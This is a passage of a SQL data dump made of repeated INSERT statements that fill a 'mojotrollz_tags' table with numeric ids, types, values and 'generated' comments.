`table`, `type`, `value`, `comment`) VALUES (4984, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4985, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4986, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4987, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5001, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5001, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5002, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5002, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5021, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5041, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5042, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5043, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5044, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5045, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5046, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5048, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5049, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5050, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5051, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5052, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5054, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5055, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5056, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5057, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5061, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5062, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5064, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5065, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5066, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5081, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5082, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5084, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5086, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5087, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5088, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5090, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5091, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5092, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5093, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5094, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5095, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5096, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5097, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5098, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5102, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5121, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5122, 4, 1, 329, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5122, 4, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5124, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5125, 4, 1, 329, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5125, 4, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5126, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5127, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5128, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5141, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5142, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5143, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5144, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5145, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5146, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5148, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5149, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5150, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5151, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5152, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5153, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5154, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5155, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5156, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5157, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5158, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5159, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5160, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5160, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5161, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5162, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5163, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5164, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5165, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5168, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5181, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5201, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5203, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5204, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5206, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5210, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5211, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5212, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5213, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5214, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5215, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5216, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5219, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5222, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5225, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5228, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5229, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5231, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5233, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5235, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5237, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5238, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5241, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5242, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5243, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5244, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5245, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5246, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5247, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5248, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5249, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5250, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5251, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5252, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5253, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5261, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5263, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5264, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5265, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5281, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5282, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5283, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5284, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5301, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5302, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5305, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5306, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5307, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5321, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5341, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5342, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5343, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5344, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5361, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5381, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5382, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5384, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5385, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5386, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5401, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5402, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5403, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5404, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5405, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5406, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5407, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5408, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5421, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5441, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5461, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5462, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5463, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5465, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5466, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5481, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5482, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5501, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5502, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5503, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5504, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5505, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5507, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5508, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5509, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5510, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5511, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5513, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5514, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5515, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5517, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5518, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5518, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5519, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5519, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5521, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5522, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5524, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5525, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5525, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5526, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5527, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5528, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5528, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5529, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5531, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5533, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5534, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5535, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5536, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5537, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5538, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5541, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5542, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5543, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5544, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5545, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5561, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5581, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5601, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5621, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5622, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5623, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5624, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5625, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5626, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5627, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5628, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5629, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5630, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5631, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5632, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5633, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5634, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5635, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5636, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5637, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5638, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5639, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5641, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5642, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5643, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5644, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5645, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5646, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5647, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5648, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5649, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5650, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5651, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5652, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5654, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5655, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5656, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5657, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5658, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5660, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5661, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5662, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 